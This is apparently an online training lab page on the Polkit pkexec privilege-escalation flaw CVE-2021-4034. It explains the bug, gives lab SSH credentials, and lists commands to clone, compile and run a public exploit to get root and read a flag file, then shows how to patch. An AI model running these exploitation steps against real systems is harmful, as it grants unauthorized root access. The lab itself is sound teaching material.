Logo

Hack linux with Polkit exploit

easy 3 tasks 60 minutes
A free online lab demonstrates how to exploit the recently discovered linux vulnerability, Polkit
A memory corruption vulnerability (CVE-2021-4034) in PolKit, a component used in major Linux distributions and some Unix-like operating systems, can be easily exploited by unprivileged users to gain full root privileges.

What Is Polkit vulnerability?

5 Points

Overview 

In this lab,

we are going to learn How to exploit polkit, gain root privileges, then fix the vulnerability.

 

But first, let's read little bit about it,

The Qualys Research Team has disclosed a 12-year-old memory corruption vulnerability in polkit tool (PolicyKit). The vulnerability is tracked as CVE-2021-4034 allows any unprivileged user to gain full root privileges on a vulnerable Linux machine.

 

What's polkit?

Polkit is formally known as PolicyKit, a small toolkit used for defining and handling authorizations on Unix/Linux platforms. 

Pkexec is a command utility in Polkit tool used to execute commands with elevated privileges. A user can use pkexec as an alternative to sudo.

 

What's wrong with polkit?

The report says, a memory corruption vulnerability exists in polkit’s pkexec command that allows an unauthorized user to gain full root privileges on the vulnerable Linux machine.

 

What are affected OS?

Since Polkit is part of the basic installation package in most of the Linux distributions, the whole Linux platform is considered vulnerable to the Polkit privilege escalation vulnerability.

 

Click Complete once you finish the task.

How to Exploit the Vulnerability

10 Points

Start the machine [green button], and wait up to 3 min to start machine,

Then connect using ssh command: ssh polkit@[start machine] -p [start machine] [refresh page to see full command]  

Machine credentials:

Username: polkit

Password: LetMeAccess

 

Check current user privilege

1- On command line, type whoami , the result will be polkit, your current username with no root privileges

2- Try to execute any root command such as sudo adduser test or sudo apt update, you can't, becuase you will be asked to enter root password!!!

 

let's use the exploit to escalate to root

1- Run the following command to download the exploit: git clone https://github.com/berdav/CVE-2021-4034.git

2- Then, go to: cd CVE-2021-4034 

3-  Compile the exploit by running make command.

4- Run ./cve-2021-4034 to execute the exploit.

5- Now you are Root :) type whoami to confitm & try  to run any root command

6- Type bash to switch to bash terminal[Optional]

 

If you are successfully run the exploit, find the flag [answer] in /root/root.txt file.

Answer fotmat: e.g {abcdefghi} with braces

Full Match Answer:

How To Fix The Vulnerability

5 Points

Very simple,

1- updates the list of available packages and their versions. it does not install or upgrade any packages.

sudo apt-get update 

2- update polkit [policykit]

sudo apt-get install policykit-1 

3- now, back to cd /home/polkit/CVE-2021-4034/ and  run the exploit again ./cve-2021-4034 , you should get nothing or a result similar to this:

 

that's it, hope u enjoyed the lab

Click Complete once you finish the task.
::

User Profile

List of tasks